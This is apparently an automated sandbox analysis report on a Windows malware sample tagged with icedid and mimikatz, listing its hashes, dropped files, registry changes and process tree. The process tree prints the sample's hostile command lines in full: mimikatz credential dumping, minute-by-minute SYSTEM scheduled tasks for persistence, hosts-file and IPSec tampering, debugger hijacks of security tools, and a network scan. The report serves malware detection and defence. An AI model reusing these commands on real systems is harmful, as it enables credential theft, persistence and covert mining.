Analysis
max time kernel: 167s
max time network: 171s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-04-2024 23:43
Behavioral task: behavioral1
Sample: 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en
General
Target: 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe
Size: 10.9MB
MD5: 74429f8c9da8be6404d2f4b0b33f4933
SHA1: a3d68cd45790386de081d284ed9bcbfe6699b059
SHA256: 7505d18e61a360038b338c802a396fe1529a6e5d6242da427e6725a473e25ad9
SHA512: 97fe4adcc81629cf7c365d4d82f22405985755e4841440ef47891fb278cc241ccf86fe917b56b635ab5c45ad7b599f5d619e2b2f64aa14c932c287109c2aed45
SSDEEP: 98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
  description: PID 4784 created 1732; pid 4784 tlmneit.exe; target process: spoolsv.exe
Contacts a large (26169) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
  resource behavioral2/memory/1096-136-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp, yara_rule INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
UPX dump on OEP (original entry point) 40 IoCs
XMRig Miner payload 12 IoCs
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
  resource behavioral2/memory/4472-0-0x0000000000400000-0x0000000000AA4000-memory.dmp, yara_rule mimikatz
  resource C:\Windows\lqtiqntg\tlmneit.exe, yara_rule mimikatz
  resource behavioral2/memory/372-7-0x0000000000400000-0x0000000000AA4000-memory.dmp, yara_rule mimikatz
  resource behavioral2/memory/1096-136-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp, yara_rule mimikatz
Drops file in Drivers directory 3 IoCs
Processes:
  File opened for modification C:\Windows\system32\drivers\etc\hosts (tlmneit.exe)
  File created C:\Windows\system32\drivers\npf.sys (wpcap.exe)
  File created C:\Windows\system32\drivers\etc\hosts (tlmneit.exe)
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
  3708 netsh.exe
  3228 netsh.exe
Sets file execution options in registry 2 TTPs 40 IoCs
Processes (all by tlmneit.exe; <IFEO> stands for \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options):
  Key created <IFEO>\mshta.exe
  Key created <IFEO>\WmiPrvSE.exe
  Set value (str) <IFEO>\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) <IFEO>\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\netsh.exe
  Key created <IFEO>\at.exe
  Set value (str) <IFEO>\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\WinSAT.exe
  Key created <IFEO>\regini.exe
  Set value (str) <IFEO>\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) <IFEO>\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\magnify.exe
  Set value (str) <IFEO>\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\sethc.exe
  Set value (str) <IFEO>\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) <IFEO>\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\rundll32.exe
  Set value (str) <IFEO>\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\powershell.exe
  Set value (str) <IFEO>\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) <IFEO>\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\cscript.exe
  Set value (str) <IFEO>\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) <IFEO>\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) <IFEO>\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\wscript.exe
  Key created <IFEO>\bitsadmin.exe
  Set value (str) <IFEO>\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\takeown.exe
  Key created <IFEO>\Regsvr32.exe
  Set value (str) <IFEO>\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\taskkill.exe
  Set value (str) <IFEO>\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\icacls.exe
  Set value (str) <IFEO>\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\perfmon.exe
  Key created <IFEO>\certutil.exe
  Set value (str) <IFEO>\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created <IFEO>\reg.exe
  Set value (str) <IFEO>\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
Executes dropped EXE 29 IoCs
Processes (pid process):
  372 tlmneit.exe, 4784 tlmneit.exe, 4660 wpcap.exe, 1200 gbybqbhgt.exe, 1096 vfshost.exe, 372 uqgqrabii.exe, 4288 bubuee.exe, 2164 uqgqrabii.exe, 4236 xohudmc.exe, 3384 hmhriy.exe
  4960 uqgqrabii.exe, 2328 uqgqrabii.exe, 3472 uqgqrabii.exe, 2584 uqgqrabii.exe, 3796 uqgqrabii.exe, 1768 uqgqrabii.exe, 4896 uqgqrabii.exe, 4924 uqgqrabii.exe, 4360 uqgqrabii.exe, 3308 uqgqrabii.exe
  440 tlmneit.exe, 372 uqgqrabii.exe, 3396 uqgqrabii.exe, 1632 uqgqrabii.exe, 2684 uqgqrabii.exe, 1072 llnysaisr.exe, 5384 uqgqrabii.exe, 3880 uqgqrabii.exe, 5544 tlmneit.exe
Loads dropped DLL 12 IoCs
Processes (pid process):
  4660 wpcap.exe (9 entries)
  1200 gbybqbhgt.exe (3 entries)
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow 82: ifconfig.me
  flow 81: ifconfig.me
Creates a Windows Service
Drops file in System32 directory 18 IoCs
Processes:
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft (tlmneit.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache (tlmneit.exe)
  File created C:\Windows\system32\wpcap.dll (wpcap.exe)
  File opened for modification C:\Windows\SysWOW64\hmhriy.exe (xohudmc.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies (tlmneit.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A (tlmneit.exe)
  File created C:\Windows\SysWOW64\hmhriy.exe (xohudmc.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 (tlmneit.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE (tlmneit.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 (tlmneit.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content (tlmneit.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 (tlmneit.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A (tlmneit.exe)
  File created C:\Windows\SysWOW64\pthreadVC.dll (wpcap.exe)
  File created C:\Windows\SysWOW64\wpcap.dll (wpcap.exe)
  File created C:\Windows\SysWOW64\Packet.dll (wpcap.exe)
  File created C:\Windows\system32\Packet.dll (wpcap.exe)
  File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData (tlmneit.exe)
Drops file in Program Files directory 3 IoCs
Processes:
  File created C:\Program Files\WinPcap\rpcapd.exe (wpcap.exe)
  File created C:\Program Files\WinPcap\LICENSE (wpcap.exe)
  File created C:\Program Files\WinPcap\uninstall.exe (wpcap.exe)
Drops file in Windows directory 60 IoCs
Processes:
 Files created by tlmneit.exe (50):
  C:\Windows\mqgbuygyl\UnattendGC\specials\coli-0.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\schoedcl.xml
  C:\Windows\lqtiqntg\svschost.xml
  C:\Windows\mqgbuygyl\UnattendGC\specials\trch-1.dll
  C:\Windows\mqgbuygyl\UnattendGC\vimpcsvc.xml
  C:\Windows\mqgbuygyl\UnattendGC\specials\vimpcsvc.xml
  C:\Windows\lqtiqntg\vimpcsvc.xml
  C:\Windows\lqtiqntg\docmicfg.xml
  C:\Windows\mqgbuygyl\UnattendGC\specials\exma-1.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\tibe-2.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\xdvl-0.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\schoedcl.exe
  C:\Windows\mqgbuygyl\upbdrjv\swrpwe.exe
  C:\Windows\mqgbuygyl\thanliysa\llnysaisr.exe
  C:\Windows\mqgbuygyl\UnattendGC\specials\spoolsrv.xml
  C:\Windows\lqtiqntg\schoedcl.xml
  C:\Windows\mqgbuygyl\UnattendGC\specials\trfo-2.dll
  C:\Windows\mqgbuygyl\UnattendGC\AppCapture32.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\crli-0.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\svschost.exe
  C:\Windows\mqgbuygyl\UnattendGC\svschost.xml
  C:\Windows\mqgbuygyl\UnattendGC\specials\cnli-1.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\posh-0.dll
  C:\Windows\mqgbuygyl\UnattendGC\schoedcl.xml
  C:\Windows\mqgbuygyl\thanliysa\ip.txt
  C:\Windows\mqgbuygyl\thanliysa\wpcap.exe
  C:\Windows\lqtiqntg\spoolsrv.xml
  C:\Windows\mqgbuygyl\UnattendGC\Shellcode.ini
  C:\Windows\ime\tlmneit.exe
  C:\Windows\mqgbuygyl\thanliysa\scan.bat
  C:\Windows\mqgbuygyl\UnattendGC\specials\libeay32.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\ssleay32.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\ucl.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\svschost.xml
  C:\Windows\mqgbuygyl\Corporate\vfshost.exe
  C:\Windows\mqgbuygyl\UnattendGC\specials\libxml2.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\zlib1.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\vimpcsvc.exe
  C:\Windows\mqgbuygyl\UnattendGC\AppCapture64.dll
  C:\Windows\mqgbuygyl\thanliysa\wpcap.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\docmicfg.exe
  C:\Windows\mqgbuygyl\UnattendGC\docmicfg.xml
  C:\Windows\mqgbuygyl\UnattendGC\specials\docmicfg.xml
  C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe
  C:\Windows\mqgbuygyl\UnattendGC\specials\spoolsrv.exe
  C:\Windows\mqgbuygyl\Corporate\mimidrv.sys
  C:\Windows\mqgbuygyl\Corporate\mimilib.dll
  C:\Windows\mqgbuygyl\thanliysa\Packet.dll
  C:\Windows\mqgbuygyl\UnattendGC\specials\tucl-1.dll
  C:\Windows\mqgbuygyl\UnattendGC\spoolsrv.xml
 Files opened for modification by tlmneit.exe (6):
  C:\Windows\mqgbuygyl\thanliysa\Packet.dll
  C:\Windows\lqtiqntg\vimpcsvc.xml
  C:\Windows\lqtiqntg\schoedcl.xml
  C:\Windows\lqtiqntg\docmicfg.xml
  C:\Windows\lqtiqntg\svschost.xml
  C:\Windows\lqtiqntg\spoolsrv.xml
 By 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe (2):
  File opened for modification C:\Windows\lqtiqntg\tlmneit.exe
  File created C:\Windows\lqtiqntg\tlmneit.exe
 By cmd.exe (1):
  File opened for modification C:\Windows\mqgbuygyl\Corporate\log.txt
 By llnysaisr.exe (1):
  File opened for modification C:\Windows\mqgbuygyl\thanliysa\Result.txt
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid process):
  1576 sc.exe
  2304 sc.exe
  4068 sc.exe
  3996 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
NSIS installer 3 IoCs
Processes:
  resource C:\Windows\lqtiqntg\tlmneit.exe, yara_rule nsis_installer_2
  resource C:\Windows\mqgbuygyl\thanliysa\wpcap.exe, yara_rule nsis_installer_1
  resource C:\Windows\mqgbuygyl\thanliysa\wpcap.exe, yara_rule nsis_installer_2
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid process):
  4920 schtasks.exe
  2160 schtasks.exe
  1556 schtasks.exe
Modifies data under HKEY_USERS 45 IoCs
Processes:
 uqgqrabii.exe (39 entries):
  Key created \REGISTRY\USER\.DEFAULT\Software
  Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals
  Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump (18 entries)
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" (18 entries)
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
 tlmneit.exe (6 entries):
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Modifies registry class 14 IoCs
Processes (all by tlmneit.exe):
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid process):
  4784 tlmneit.exe (64 entries)
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid 672 (image name not recorded; 15 IoCs, all for PID 672)
-
Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
Token: SeDebugPrivilege | pid 4472 | 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | pid 372 | tlmneit.exe
Token: SeDebugPrivilege | pid 4784 | tlmneit.exe
Token: SeDebugPrivilege | pid 1096 | vfshost.exe
Token: SeDebugPrivilege | pid 372 | uqgqrabii.exe
Token: SeLockMemoryPrivilege | pid 4288 | bubuee.exe
Token: SeLockMemoryPrivilege | pid 4288 | bubuee.exe
Token: SeDebugPrivilege | pid 2164 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 4960 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 2328 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 3472 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 2584 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 3796 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 1768 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 4896 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 4924 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 4360 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 3308 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 372 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 3396 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 1632 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 2684 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 5384 | uqgqrabii.exe
Token: SeDebugPrivilege | pid 3880 | uqgqrabii.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid 4472 | 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe (2 entries)
pid 372 | tlmneit.exe (2 entries)
pid 4784 | tlmneit.exe (2 entries)
pid 4236 | xohudmc.exe
pid 3384 | hmhriy.exe
pid 440 | tlmneit.exe (2 entries)
pid 5544 | tlmneit.exe (2 entries)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source PID wrote to target PID; source image -> target image; each write is listed three times in the report):
PID 4472 wrote to memory of 4620 (2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe -> cmd.exe) x3
PID 4620 wrote to memory of 2696 (cmd.exe -> PING.EXE) x3
PID 4620 wrote to memory of 372 (cmd.exe -> tlmneit.exe) x3
PID 4784 wrote to memory of 1196 (tlmneit.exe -> cmd.exe) x3
PID 1196 wrote to memory of 1928 (cmd.exe -> cmd.exe) x3
PID 1196 wrote to memory of 3984 (cmd.exe -> cacls.exe) x3
PID 1196 wrote to memory of 2332 (cmd.exe -> cmd.exe) x3
PID 1196 wrote to memory of 4024 (cmd.exe -> cacls.exe) x3
PID 1196 wrote to memory of 1504 (cmd.exe -> cmd.exe) x3
PID 1196 wrote to memory of 4412 (cmd.exe -> cacls.exe) x3
PID 4784 wrote to memory of 1200 (tlmneit.exe -> netsh.exe) x3
PID 4784 wrote to memory of 3352 (tlmneit.exe -> netsh.exe) x3
PID 4784 wrote to memory of 2956 (tlmneit.exe -> netsh.exe) x3
PID 4784 wrote to memory of 2736 (tlmneit.exe -> cmd.exe) x3
PID 2736 wrote to memory of 4660 (cmd.exe -> wpcap.exe) x3
PID 4660 wrote to memory of 4984 (wpcap.exe -> net.exe) x3
PID 4984 wrote to memory of 5112 (net.exe -> net1.exe) x3
PID 4660 wrote to memory of 3796 (wpcap.exe -> net.exe) x3
PID 3796 wrote to memory of 2104 (net.exe -> net1.exe) x3
PID 4660 wrote to memory of 2592 (wpcap.exe -> net.exe) x3
PID 2592 wrote to memory of 892 (net.exe -> net1.exe) x3
PID 4660 wrote to memory of 4760 (wpcap.exe -> net.exe) x1
Processes
Each entry gives the tree depth, the image path, the command line, the behaviours flagged for that process, and its PID.
-
[depth 1] C:\Windows\System32\spoolsv.exe
  cmdline: C:\Windows\System32\spoolsv.exe
PID:1732
-
[depth 2] C:\Windows\TEMP\cnzhtbqil\bubuee.exe
  cmdline: "C:\Windows\TEMP\cnzhtbqil\bubuee.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe"
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4472
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lqtiqntg\tlmneit.exe
- Suspicious use of WriteProcessMemory
PID:4620
-
[depth 3] C:\Windows\SysWOW64\PING.EXE
  cmdline: ping 127.0.0.1 -n 5
- Runs ping.exe
PID:2696
-
[depth 3] C:\Windows\lqtiqntg\tlmneit.exe
  cmdline: C:\Windows\lqtiqntg\tlmneit.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:372
-
[depth 1] C:\Windows\lqtiqntg\tlmneit.exe
  cmdline: C:\Windows\lqtiqntg\tlmneit.exe
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4784
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
- Suspicious use of WriteProcessMemory
PID:1196
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:1928
-
[depth 3] C:\Windows\SysWOW64\cacls.exe
  cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
PID:3984
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:2332
-
[depth 3] C:\Windows\SysWOW64\cacls.exe
  cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
PID:4024
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:1504
-
[depth 3] C:\Windows\SysWOW64\cacls.exe
  cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
PID:4412
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static del all
PID:1200
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards
PID:3352
-
[depth 2] C:\Windows\SysWOW64\netsh.exe
  cmdline: netsh ipsec static add filteraction name=BastardsList action=block
PID:2956
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c C:\Windows\mqgbuygyl\thanliysa\wpcap.exe /S
- Suspicious use of WriteProcessMemory
PID:2736
-
[depth 3] C:\Windows\mqgbuygyl\thanliysa\wpcap.exe
  cmdline: C:\Windows\mqgbuygyl\thanliysa\wpcap.exe /S
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4660
-
[depth 4] C:\Windows\SysWOW64\net.exe
  cmdline: net stop "Boundary Meter"
- Suspicious use of WriteProcessMemory
PID:4984
-
[depth 5] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 stop "Boundary Meter"
PID:5112
-
[depth 4] C:\Windows\SysWOW64\net.exe
  cmdline: net stop "TrueSight Meter"
- Suspicious use of WriteProcessMemory
PID:3796
-
[depth 5] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 stop "TrueSight Meter"
PID:2104
-
[depth 4] C:\Windows\SysWOW64\net.exe
  cmdline: net stop npf
- Suspicious use of WriteProcessMemory
PID:2592
-
[depth 5] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 stop npf
PID:892
-
[depth 4] C:\Windows\SysWOW64\net.exe
  cmdline: net start npf
PID:4760
-
[depth 5] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 start npf
PID:2156
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c net start npf
PID:2464
-
[depth 3] C:\Windows\SysWOW64\net.exe
  cmdline: net start npf
PID:2528
-
[depth 4] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 start npf
PID:952
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c net start npf
PID:1564
-
[depth 3] C:\Windows\SysWOW64\net.exe
  cmdline: net start npf
PID:4412
-
[depth 4] C:\Windows\SysWOW64\net1.exe
  cmdline: C:\Windows\system32\net1 start npf
PID:2724
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mqgbuygyl\thanliysa\Scant.txt
PID:4560
-
[depth 3] C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe
  cmdline: C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mqgbuygyl\thanliysa\Scant.txt
- Executes dropped EXE
- Loads dropped DLL
PID:1200
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c C:\Windows\mqgbuygyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mqgbuygyl\Corporate\log.txt
- Drops file in Windows directory
PID:2408
-
[depth 3] C:\Windows\mqgbuygyl\Corporate\vfshost.exe
  cmdline: C:\Windows\mqgbuygyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rtttegmpt" /ru system /tr "cmd /c C:\Windows\ime\tlmneit.exe"
PID:4240
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:2412
-
[depth 3] C:\Windows\SysWOW64\schtasks.exe
  cmdline: schtasks /create /sc minute /mo 1 /tn "rtttegmpt" /ru system /tr "cmd /c C:\Windows\ime\tlmneit.exe"
- Creates scheduled task(s)
PID:1556
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltcsllnry" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F"
PID:3876
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:116
-
[depth 3] C:\Windows\SysWOW64\schtasks.exe
  cmdline: schtasks /create /sc minute /mo 1 /tn "ltcsllnry" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F"
- Creates scheduled task(s)
PID:4920
-
[depth 2] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zlnubbstt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F"
PID:4180
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
PID:4824
-
[depth 3] C:\Windows\SysWOW64\schtasks.exe
  cmdline: schtasks /create /sc minute /mo 1 /tn "zlnubbstt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F"
- Creates scheduled task(s)
PID:2160
-
